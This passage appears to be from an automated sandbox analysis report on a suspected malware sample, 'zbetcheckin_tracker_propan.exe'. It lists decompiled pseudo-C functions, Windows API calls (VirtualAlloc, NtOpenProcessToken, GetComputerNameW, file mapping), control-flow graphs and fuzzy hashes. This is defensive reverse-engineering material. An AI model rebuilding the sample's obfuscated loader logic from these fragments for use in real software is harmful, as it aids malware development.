      					HeapDestroy( *0x405440);
      				}
      				ExitProcess(_t6);
      			}

      APIs
      • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 0040100A
      • GetModuleHandleA.KERNELBASE(00000000), ref: 0040101A
      • GetCommandLineW.KERNELBASE ref: 00401025
        • Part of subcall function 004010ED: GetCursorPos.USER32(?), ref: 00401118
        • Part of subcall function 004010ED: WaitForSingleObject.KERNEL32(00000040,?,00000000), ref: 00401125
        • Part of subcall function 004010ED: GetCursorPos.USER32(?), ref: 00401134
        • Part of subcall function 004010ED: GetCurrentProcessId.KERNEL32(?,?,736C6E70,?,00000000), ref: 0040122A
        • Part of subcall function 004010ED: wsprintfW.USER32 ref: 0040123B
        • Part of subcall function 004010ED: lstrlenW.KERNEL32(?), ref: 0040124F
        • Part of subcall function 004010ED: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,?), ref: 00401260
        • Part of subcall function 004010ED: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00401270
        • Part of subcall function 004010ED: lstrcpyW.KERNEL32(00000000), ref: 00401283
        • Part of subcall function 004010ED: UnmapViewOfFile.KERNEL32(00000000), ref: 0040128A
        • Part of subcall function 004010ED: GetCurrentThreadId.KERNEL32(?,?,736C6E70,?,00000000), ref: 004012AA
        • Part of subcall function 004010ED: GetCurrentThread.KERNEL32(?,00000000), ref: 004012BD
        • Part of subcall function 004010ED: GetLastError.KERNEL32(?,00000000), ref: 004012E5
      • HeapDestroy.KERNEL32 ref: 00401038
      • ExitProcess.KERNEL32 ref: 0040103F
      Memory Dump Source
      • Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: CurrentFile$CreateCursorHeapProcessThreadView$CommandDestroyErrorExitHandleLastLineMappingModuleObjectSingleUnmapWaitlstrcpylstrlenwsprintf
      • String ID:
      • API String ID: 1825853680-0
      • Opcode ID: 46997d1b3fa60607fb4d967d660b9805b514087fefde80263f9ad736616b84e5
      • Instruction ID: 3660558e5181c470f1db29b591f8313a66fca8dcae8bfb226ac8d0b8d28842ce
      • Opcode Fuzzy Hash: 46997d1b3fa60607fb4d967d660b9805b514087fefde80263f9ad736616b84e5
      • Instruction Fuzzy Hash: 4CE0B6B18016209BC7212BB1BF0CB8B3E69FB4535AB000135F705F2170CB3844808FAD

      Control-flow Graph

      control_flow_graph 423 40009e-4000a0 424 4000a1-4000ab 423->424 425 400073 424->425 426 4000ad-4000b3 424->426 428 40007a-400083 425->428 427 4000b5-4000bb 426->427 426->428 429 400084-400098 427->429 430 4000bd-4000c0 427->430 428->429 438 40009a 429->438 431 4000c2-4000c3 430->431 432 400123-40012a 430->432 431->424 434 4000c5-4000c8 431->434 436 40012b-400210 432->436 434->436 437 4000ca-4000d3 434->437 447 400213-400214 436->447 448 400277-40028b 436->448 437->438 446 4000d5-40010a 437->446 440 40010c-400122 438->440 441 40009c 438->441 440->432 446->440 447->448 450 400216-40023b 447->450 454 4002f0-401017 448->454 455 40028d-40029c 448->455 452 40023d-400275 450->452 453 40029e-4002ee 450->453 452->448 453->454 457 401019-401038 GetModuleHandleA GetCommandLineW call 4010ed HeapDestroy 454->457 458 40103e-40103f ExitProcess 454->458 455->453 457->458
      APIs
      • GetModuleHandleA.KERNELBASE(00000000), ref: 0040101A
      • GetCommandLineW.KERNELBASE ref: 00401025
        • Part of subcall function 004010ED: GetCursorPos.USER32(?), ref: 00401118
        • Part of subcall function 004010ED: WaitForSingleObject.KERNEL32(00000040,?,00000000), ref: 00401125
        • Part of subcall function 004010ED: GetCursorPos.USER32(?), ref: 00401134
        • Part of subcall function 004010ED: GetCurrentProcessId.KERNEL32(?,?,736C6E70,?,00000000), ref: 0040122A
        • Part of subcall function 004010ED: wsprintfW.USER32 ref: 0040123B
        • Part of subcall function 004010ED: lstrlenW.KERNEL32(?), ref: 0040124F
        • Part of subcall function 004010ED: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,?), ref: 00401260
        • Part of subcall function 004010ED: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00401270
        • Part of subcall function 004010ED: lstrcpyW.KERNEL32(00000000), ref: 00401283
        • Part of subcall function 004010ED: UnmapViewOfFile.KERNEL32(00000000), ref: 0040128A
        • Part of subcall function 004010ED: GetCurrentThreadId.KERNEL32(?,?,736C6E70,?,00000000), ref: 004012AA
        • Part of subcall function 004010ED: GetCurrentThread.KERNEL32(?,00000000), ref: 004012BD
        • Part of subcall function 004010ED: GetLastError.KERNEL32(?,00000000), ref: 004012E5
      • HeapDestroy.KERNEL32 ref: 00401038
      • ExitProcess.KERNEL32 ref: 0040103F
      Memory Dump Source
      • Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: CurrentFile$CursorProcessThreadView$CommandCreateDestroyErrorExitHandleHeapLastLineMappingModuleObjectSingleUnmapWaitlstrcpylstrlenwsprintf
      • String ID:
      • API String ID: 3328684964-0
      • Opcode ID: 4cab8bfa91b30c5f08ef29135326620567db0eab0d43e2b5cf40167085a431bb
      • Instruction ID: e7986d4482a50aa81d5ba86c80f45fdd99c21c801ab98a1a08adee72aeaa991a
      • Opcode Fuzzy Hash: 4cab8bfa91b30c5f08ef29135326620567db0eab0d43e2b5cf40167085a431bb
      • Instruction Fuzzy Hash: 939174A284E3C00FDB13977129646957F71AE53285B0E41EBC485EF4E3D22D488ED76B
      C-Code - Quality: 53%
      			E00411650(intOrPtr __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
      				void* _t16;
      				struct HINSTANCE__* _t18;
      				_Unknown_base(*)()* _t19;
      				intOrPtr _t23;
      				_Unknown_base(*)()* _t29;
      				void* _t30;
      
      				_push(0x14);
      				_push(0x418e00);
      				E0040D48C(__ebx, __edi, __esi);
      				 *((intOrPtr*)(_t30 - 0x1c)) = 0;
      				_t29 = E0040F8BC( *0x4366c4);
      				if(_t29 == 0) {
      					_t16 = E0040CE99(_t30 - 0x1c);
      					_pop(_t23);
      					_t35 = _t16;
      					if(_t16 != 0) {
      						_push(0);
      						_push(0);
      						_push(0);
      						_push(0);
      						_push(0);
      						E0040CA26(__ebx, _t23, __edx, 0, _t35);
      					}
      					if( *((intOrPtr*)(_t30 - 0x1c)) == 1) {
      						L6:
      						_t29 = E00411640;
      					} else {
      						_t18 = GetModuleHandleA("kernel32.dll"); // executed
      						if(_t18 == 0) {
      							goto L6;
      						} else {
      							_t19 = GetProcAddress(_t18, "InitializeCriticalSectionAndSpinCount"); // executed
      							_t29 = _t19;
      							if(_t29 == 0) {
      								goto L6;
      							}
      						}
      					}
      					 *0x4366c4 = E0040F850(_t29);
      				}
      				 *((intOrPtr*)(_t30 - 4)) = 0;
      				 *((intOrPtr*)(_t30 - 0x20)) =  *_t29( *((intOrPtr*)(_t30 + 8)),  *((intOrPtr*)(_t30 + 0xc)));
      				 *((intOrPtr*)(_t30 - 4)) = 0xfffffffe;
      				return E0040D4D1( *((intOrPtr*)(_t30 - 0x20)));
      			}

      APIs
        • Part of subcall function 0040F8BC: TlsGetValue.KERNEL32(00000000,0040F943), ref: 0040F8C9
        • Part of subcall function 0040F8BC: TlsGetValue.KERNEL32(00000004), ref: 0040F8E0
        • Part of subcall function 0040F8BC: GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 0040F8F5
        • Part of subcall function 0040F8BC: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 0040F905
        • Part of subcall function 0040F8BC: RtlDecodePointer.NTDLL(?), ref: 0040F913
      • GetModuleHandleA.KERNELBASE(kernel32.dll,00000014,0040D3F9,00000000,00000FA0,00418C78,0000000C,0040D458,00000001,?,?,0040D22C,00000004,00418C58,0000000C,004110EC), ref: 00411699
      • GetProcAddress.KERNELBASE(00000000,InitializeCriticalSectionAndSpinCount,?,0040D22C,00000004,00418C58,0000000C,004110EC,00000000), ref: 004116A9
        • Part of subcall function 0040F850: TlsGetValue.KERNEL32(00000000,0040F8BA,00000000,00412290,00000000,00000000,00000314,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 0040F85D
        • Part of subcall function 0040F850: TlsGetValue.KERNEL32(00000004,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 0040F874
        • Part of subcall function 0040F850: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 0040F889
        • Part of subcall function 0040F850: GetProcAddress.KERNEL32(00000000,EncodePointer,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 0040F899
        • Part of subcall function 0040F850: RtlEncodePointer.NTDLL(?,?,?,?,00436218,0040EEF7,00436218,Microsoft Visual C++ Runtime Library,00012010), ref: 0040F8A7
        • Part of subcall function 0040CA26: IsDebuggerPresent.KERNEL32(?,?,0040EEF7), ref: 0040CAD0
        • Part of subcall function 0040CA26: SetUnhandledExceptionFilter.KERNEL32 ref: 0040CADA
        • Part of subcall function 0040CA26: UnhandledExceptionFilter.KERNEL32(?), ref: 0040CAE4
        • Part of subcall function 0040CA26: GetCurrentProcess.KERNEL32(C000000D,?,?,0040EEF7), ref: 0040CAFF
        • Part of subcall function 0040CA26: TerminateProcess.KERNEL32(00000000,?,?,0040EEF7), ref: 0040CB06
      Strings
      • kernel32.dll, xrefs: 00411694
      • InitializeCriticalSectionAndSpinCount, xrefs: 004116A3
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Value$AddressHandleModuleProc$ExceptionFilterPointerProcessUnhandled$CurrentDebuggerDecodeEncodePresentTerminate
      • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
      • API String ID: 3978095639-3733552308
      • Opcode ID: c4ba39d00cd69071d496a3caa1a9ff85372b94adc1c16ef2ffb4e544e1077159
      • Instruction ID: 10b67c62758283e54975a8c2a8718c2afbb13bd149e7d6db9f50ab6a7734c4d0
      • Opcode Fuzzy Hash: c4ba39d00cd69071d496a3caa1a9ff85372b94adc1c16ef2ffb4e544e1077159
      • Instruction Fuzzy Hash: 3901D872D00215ABCB21BF75DC459DE7A71AB44310715827BF515B33B1EB3D49818A6C
      C-Code - Quality: 65%
      			E0040E1B8() {
      				signed long long _v12;
      				signed int _v20;
      				signed long long _v28;
      				signed char _t8;
      
      				_t8 = GetModuleHandleA("KERNEL32"); // executed
      				if(_t8 == 0) {
      					L6:
      					_v20 =  *0x417a50;
      					_v28 =  *0x417a48;
      					asm("fsubr qword [ebp-0x18]");
      					_v12 = _v28 / _v20 * _v20;
      					asm("fld1");
      					asm("fcomp qword [ebp-0x8]");
      					asm("fnstsw ax");
      					if((_t8 & 0x00000005) != 0) {
      						return 0;
      					} else {
      						return 1;
      					}
      				} else {
      					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent"); // executed
      					if(__eax == 0) {
      						goto L6;
      					} else {
      						_push(0);
      						return __eax;
      					}
      				}
      			}

      APIs
      • GetModuleHandleA.KERNEL32(KERNEL32,0040C672), ref: 0040E1BD
      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0040E1CD
      Strings
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: AddressHandleModuleProc
      • String ID: IsProcessorFeaturePresent$KERNEL32
      • API String ID: 1646373207-3105848591
      • Opcode ID: 5c8b0a2a3fd0743bf04907dc865b83f30a7debde992b96672e13496cb7125439
      • Instruction ID: 81a772609b1be3753ee91d77cf381401c8db6a6cdce0ee8bcfb7c7911c54f1bb
      • Opcode Fuzzy Hash: 5c8b0a2a3fd0743bf04907dc865b83f30a7debde992b96672e13496cb7125439
      • Instruction Fuzzy Hash: 8AC012307CC302AADA102BB20C09B9BB9782F09B82F208C726909E91C1CA7CC120816D
      APIs
      • SysAllocString.OLEAUT32(?), ref: 002D5311
      • SysFreeString.OLEAUT32(?), ref: 002D53E5
        • Part of subcall function 002D50FB: SysAllocString.OLEAUT32(002DA298), ref: 002D5143
        • Part of subcall function 002D50FB: lstrcmpW.KERNEL32(00000000,002DC068), ref: 002D5212
        • Part of subcall function 002D503C: Sleep.KERNEL32(000000C8), ref: 002D506A
        • Part of subcall function 002D503C: lstrlenW.KERNEL32(?), ref: 002D50A0
        • Part of subcall function 002D503C: memcpy.NTDLL(00000000,?,?,?), ref: 002D50C1
        • Part of subcall function 002D503C: SysFreeString.OLEAUT32(?), ref: 002D50D5
      • SafeArrayDestroy.OLEAUT32(?), ref: 002D5439
      • SysFreeString.OLEAUT32(?), ref: 002D5447
        • Part of subcall function 002D5273: Sleep.KERNELBASE(000001F4), ref: 002D52B8
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: String$Free$AllocSleep$ArrayDestroySafelstrcmplstrlenmemcpy
      • String ID:
      • API String ID: 4134243222-0
      • Opcode ID: c945c3e9ff48ddf0d8783393798eb97caf344694bb1657d9db19f42877c480ff
      • Instruction ID: b288aaaf5e6d555cd4015589b95bde5cec31add50da07ef7cc3bb08b7dd4aa47
      • Opcode Fuzzy Hash: c945c3e9ff48ddf0d8783393798eb97caf344694bb1657d9db19f42877c480ff
      • Instruction Fuzzy Hash: AE51503691061AEFCB10DFE4D8849AEB7B6FF88341B14886AE501EB320D7B19D55CF51
      APIs
      • GetModuleHandleA.KERNEL32(002DC0EA), ref: 002D1ED5
      • CoInitializeEx.OLE32(00000000,00000002), ref: 002D1F0C
        • Part of subcall function 002D4C8B: GetVersionExA.KERNEL32(?), ref: 002D4CA4
        • Part of subcall function 002D4C8B: wsprintfA.USER32 ref: 002D4D08
        • Part of subcall function 002D4615: NtOpenProcess.NTDLL(00000000,00000400,?,002D1F56), ref: 002D465C
        • Part of subcall function 002D4615: NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 002D466F
        • Part of subcall function 002D4615: memcpy.NTDLL(00000000,00000000,0000001C), ref: 002D46B5
        • Part of subcall function 002D4615: NtClose.NTDLL(?), ref: 002D46C7
        • Part of subcall function 002D4615: NtClose.NTDLL(00000000), ref: 002D46D1
        • Part of subcall function 002D1000: RtlAllocateHeap.NTDLL(00000000,?,002D4CB5), ref: 002D100C
      • memset.NTDLL ref: 002D1FA7
      • RtlInitializeCriticalSection.NTDLL(002DB29C), ref: 002D1FB8
        • Part of subcall function 002D46DF: RtlAllocateHeap.NTDLL(00000000,?), ref: 002D471C
        • Part of subcall function 002D46DF: HeapFree.KERNEL32(00000000,00000000), ref: 002D474D
        • Part of subcall function 002D46DF: GetComputerNameW.KERNEL32(00000000,?), ref: 002D475B
        • Part of subcall function 002D46DF: RtlAllocateHeap.NTDLL(00000000,?), ref: 002D4772
        • Part of subcall function 002D46DF: GetComputerNameW.KERNEL32(00000000,?), ref: 002D4783
        • Part of subcall function 002D46DF: HeapFree.KERNEL32(00000000,00000000), ref: 002D47A4
        • Part of subcall function 002D1173: HeapFree.KERNEL32(00000000,?,00000000), ref: 002D1336
        • Part of subcall function 002D1D31: CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 002D1D52
        • Part of subcall function 002D1D31: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 002D1DA7
        • Part of subcall function 002D1D31: HeapFree.KERNEL32(00000000,?), ref: 002D1E22
        • Part of subcall function 002D1D31: CloseHandle.KERNEL32(?), ref: 002D1E32
        • Part of subcall function 002D1D31: _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 002D1E7E
        • Part of subcall function 002D1D31: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 002D1EA4
        • Part of subcall function 002D1D31: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,002D1FF0,00000058,00000000), ref: 002D1EB9
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Heap$Free$AllocateClose$ComputerHandleInitializeMultipleNameObjectsOpenProcessWait$CreateCriticalErrorLastModuleSectionTimerTokenVersionWaitable_allmulmemcpymemsetwsprintf
      • String ID:
      • API String ID: 3223691794-0
      • Opcode ID: 9def78826ac54dacfc49cd4be8beab93feb854996bc4f1a8bbd402b7b3358413
      • Instruction ID: 9daf09b8d5eae4b1298c62847519a61f5b8048759fb0c439cc66d8bee7b8a49a
      • Opcode Fuzzy Hash: 9def78826ac54dacfc49cd4be8beab93feb854996bc4f1a8bbd402b7b3358413
      • Instruction Fuzzy Hash: 60310372E31312AFDB219F68AC19B3D37A4AB05781F15012BE941E6B90E7B0CC34CB90
      C-Code - Quality: 100%
      			E004046A0(long _a4) {
      				signed char _v5;
      				intOrPtr _v12;
      				intOrPtr _v20;
      				short _v32;
      				char _v34;
      				intOrPtr* _v40;
      				signed short _v44;
      				intOrPtr _v56;
      				intOrPtr _v60;
      				intOrPtr _v64;
      				intOrPtr _v80;
      				short _v88;
      				short _v112;
      				intOrPtr _v120;
      				long _v132;
      				char _v137;
      				signed short _v144;
      				char _v149;
      				intOrPtr _v156;
      				signed char _v157;
      				short _v168;
      				intOrPtr _v172;
      				char _v176;
      				intOrPtr _v180;
      				signed int _v192;
      				intOrPtr _v196;
      				char _v201;
      				intOrPtr _v208;
      				intOrPtr _v212;
      				signed int _v224;
      				intOrPtr _v236;
      				intOrPtr _v240;
      				char _v245;
      				signed int _v252;
      				intOrPtr _v256;
      				void* _t63;
      
      				_v112 = 0xa;
      				_v157 = 0x21;
      				_v88 = 0x1d;
      				_v201 = 0x13;
      				_v224 = 0x11;
      				_v44 = 0x2d;
      				_v32 = 0x26;
      				_v168 = _v196 + 0x00000058 & _v252 ^ _v144 & 0x0000ffff;
      				_v149 = 0x21 - _v180 + 0x1d;
      				_v40 =  &_v176;
      				_v80 = _v20 + _v236;
      				 *_v40 = _v256;
      				_v137 = 0x00000031 - (_v5 & 0x000000ff) & _v172 - _v196 + _v156;
      				_v132 = _a4;
      				_v60 = _v192 + 0x45;
      				if(_v208 == 0x1d) {
      					_v44 = 0x5b - _v56;
      					_v224 = _v212 + 0x0000000f - _v240 & _v224;
      				}
      				_v34 = 0x00000018 - _v12 ^ 0xfffffffd;
      				_v245 = _v236 +  *0x436050 & _v64 + 0x0000003c & _v192;
      				_t63 = VirtualAlloc(0, _v132, 0x1000, 4); // executed
      				 *0x42d028 = _t63;
      				_v120 = _v60 - (_v44 & 0x0000ffff) + (_v157 & 0x000000ff);
      				_v172 = 0x3a;
      				return 0x3a - _v172;
      			}








































      APIs
      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004047CE
      Strings
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: AllocVirtual
      • String ID: !$&$-
      • API String ID: 4275171209-2636402241
      • Opcode ID: 9e1fbba10aa5e94795f5f7174e160fc96360cf60b5177d4bc5ecc1fea85b5657
      • Instruction ID: e0a633122d212c40b604d23b0a668ecc6ddbcc564ff0935ed251309ee6c2b0e4
      • Opcode Fuzzy Hash: 9e1fbba10aa5e94795f5f7174e160fc96360cf60b5177d4bc5ecc1fea85b5657
      • Instruction Fuzzy Hash: 9E41F275E042688FDB24CFA8DC84BEDBBB1AF49304F0481E9E448A7345D6745A88CF29
      C-Code - Quality: 85%
      			E00401DFD(void* __ebx, void* __ecx, void* __edi, void* _a4) {
      				CHAR* _v8;
      				struct _OVERLAPPED* _v12;
      				long _v16;
      				void _v20;
      				void* _t16;
      				void* _t22;
      				long _t23;
      				int _t27;
      				long _t31;
      
      				_v12 = 0;
      				_t16 = E00402685(__ecx, __edi,  &_v8, 0); // executed
      				if(_t16 != 0) {
      					L11:
      					return _v12;
      				}
      				_push(0);
      				_push(_a4);
      				_push(__edi); // executed
      				"j,h@A@"(); // executed
      				if(_t16 == 0) {
      					L10:
      					E0040105B(_v8);
      					goto L11;
      				}
      				_t31 = E00402B1E(__edi, __ecx, _t16 - __edi);
      				if(_t31 != 0) {
      					_t22 = CreateFileA(_v8, 0x80000000, 1, 0, 3, 0x80, 0); // executed
      					_a4 = _t22;
      					if(_t22 != 0xffffffff) {
      						_t23 = SetFilePointer(_t22, _t31, 0, 0); // executed
      						if(_t23 == _t31) {
      							_t27 = ReadFile(_a4,  &_v20, 4,  &_v16, 0); // executed
      							if(_t27 != 0 && _v16 == 4) {
      								_v12 = _v20 + __edi;
      							}
      						}
      						CloseHandle(_a4);
      					}
      				}
      				goto L10;
      			}













      APIs
        • Part of subcall function 00402685: GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000208,767F1218,00000000,?,?,00401C28,?,00000001,767F1218,00000000), ref: 004026AB
        • Part of subcall function 00402685: GetModuleFileNameA.KERNEL32(?,00000000,00000104,00000208,767F1218,00000000,?,?,00401C28,?,00000001,767F1218,00000000), ref: 004026B3
        • Part of subcall function 00402685: GetLastError.KERNEL32(?,?,00401C28,?,00000001,767F1218,00000000,?,?,?,?,00401196,?,00000000), ref: 004026F1
        • Part of subcall function 004029CC: lstrcmpA.KERNEL32(?,?,00404140,0000002C,00402845,76EA0000,00000000,76EC0C30,?,?,00401187,?,00000000), ref: 00402A9A
        • Part of subcall function 004029CC: lstrlenA.KERNEL32(?,00404140,0000002C,00402845,76EA0000,00000000,76EC0C30,?,?,00401187,?,00000000), ref: 00402AA5
      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00401E4E
      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,0040133F,LdrLoadDll), ref: 00401E60
      • ReadFile.KERNEL32 ref: 00401E78
      • CloseHandle.KERNEL32 ref: 00401E93
        • Part of subcall function 0040105B: HeapFree.KERNEL32(00000000,00000000,00402908), ref: 00401067
      Memory Dump Source
      • Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: File$ModuleName$CloseCreateErrorFreeHandleHeapLastPointerReadlstrcmplstrlen
      • String ID:
      • API String ID: 846255529-0
      • Opcode ID: 7cd500dd162e9791686f5f95744faff107afc67e854dc290e62b29d2c5798e89
      • Instruction ID: 548c3f1f3fb7db819cab90cac91c881d4ce4814ddec138ff16a6531c9e924b4a
      • Opcode Fuzzy Hash: 7cd500dd162e9791686f5f95744faff107afc67e854dc290e62b29d2c5798e89
      • Instruction Fuzzy Hash: 21118EB1A00118BADB20AFA5CD89EAF7E7DEF41794F104036FA05F61E0C3749E40C6A8
      APIs
      • GetModuleFileNameA.KERNELBASE(00000000,C:\Users\user\Desktop\zbetcheckin_tracker_propan.exe,00000104), ref: 0040F404
        • Part of subcall function 00411099: Sleep.KERNEL32(00000000), ref: 004110B6
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: FileModuleNameSleep
      • String ID: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exe$h,_
      • API String ID: 4084727719-301230119
      • Opcode ID: f721bb1b8912cc00147c7dbf815b772de8ddca877d5da806554e0ba7126dc6b1
      • Instruction ID: f7f7e859044ada10db05f7afe2aa83ef5da452e730da1612489c00f235542acb
      • Opcode Fuzzy Hash: f721bb1b8912cc00147c7dbf815b772de8ddca877d5da806554e0ba7126dc6b1
      • Instruction Fuzzy Hash: B411D571D00109BFCB20DFB9AC818DF7BB9EA55328761867BE915E32D0D2345A49CB98
      C-Code - Quality: 96%
      			E0040F3DA(void* __ecx) {
      				CHAR* _v8;
      				signed int _v12;
      				char _v16;
      				void* __edi;
      				intOrPtr* _t14;
      				signed int _t17;
      				char _t27;
      				void* _t28;
      				signed int _t37;
      				intOrPtr _t41;
      
      				_t26 = __ecx;
      				_t41 =  *0x436c0c; // 0x1
      				if(_t41 == 0) {
      					E0041051A(__ecx);
      				}
      				 *0x43663c = 0; // executed
      				GetModuleFileNameA(0, 0x436538, 0x104);
      				_t14 =  *0x436c14; // 0x5f2c68
      				 *0x4360ac = 0x436538;
      				if(_t14 == 0) {
      					L4:
      					_v8 = 0x436538;
      					goto L5;
      				} else {
      					_v8 = _t14;
      					if( *_t14 != 0) {
      						L5:
      						E0040F242(_t26, _v8,  &_v16, 0, 0,  &_v12);
      						_t17 = _v12;
      						if(_t17 >= 0x3fffffff) {
      							L10:
      							return _t17 | 0xffffffff;
      						}
      						_t27 = _v16;
      						if(_t27 >= 0xffffffff) {
      							goto L10;
      						}
      						_t33 = _t17 << 2;
      						_t17 = (_t17 << 2) + _t27;
      						if(_t17 < _t27) {
      							goto L10;
      						}
      						_t17 = E00411099(_t17);
      						_t37 = _t17;
      						_pop(_t28);
      						if(_t37 == 0) {
      							goto L10;
      						}
      						E0040F242(_t28, _v8,  &_v16, _t37, _t33 + _t37,  &_v12);
      						 *0x436090 = _v12 - 1;
      						 *0x436094 = _t37;
      						return 0;
      					}
      					goto L4;
      				}
      			}














      APIs
      • GetModuleFileNameA.KERNELBASE(00000000,C:\Users\user\Desktop\zbetcheckin_tracker_propan.exe,00000104), ref: 0040F404
        • Part of subcall function 00411099: Sleep.KERNEL32(00000000,00000001,00000001,0040D3C9,00000018,00418C78,0000000C,0040D458,00000001,?,?,0040D22C,00000004,00418C58,0000000C,004110EC), ref: 004110B6
      Strings
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: FileModuleNameSleep
      • String ID: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exe$h,_
      • API String ID: 4084727719-301230119
      • Opcode ID: 6bd42cb492e30777a8f82e1ac3e7892b6374d7cdf348f580bf185e2720185fdf
      • Instruction ID: f7f7e859044ada10db05f7afe2aa83ef5da452e730da1612489c00f235542acb
      • Opcode Fuzzy Hash: 6bd42cb492e30777a8f82e1ac3e7892b6374d7cdf348f580bf185e2720185fdf
      • Instruction Fuzzy Hash: B411D571D00109BFCB20DFB9AC818DF7BB9EA55328761867BE915E32D0D2345A49CB98
      APIs
      • RtlAllocateHeap.NTDLL(00000000,00000800,002DA05C), ref: 002D1BCA
        • Part of subcall function 002D4BFE: memcpy.NTDLL(00000000,00000084,00000084,?,00000000,00000008,?,?,002D1BFC,?,?,?,002D1DF2,00000002,?,?), ref: 002D4C20
        • Part of subcall function 002D4BFE: memset.NTDLL ref: 002D4C53
        • Part of subcall function 002D4BFE: memcpy.NTDLL(?,?,00000000,00000000,?,?,00000000), ref: 002D4C6D
        • Part of subcall function 002D482D: RtlEnterCriticalSection.NTDLL(002DB29C), ref: 002D4836
        • Part of subcall function 002D482D: Sleep.KERNEL32(0000000A,?,002D1DF2,00000002,?,?), ref: 002D4840
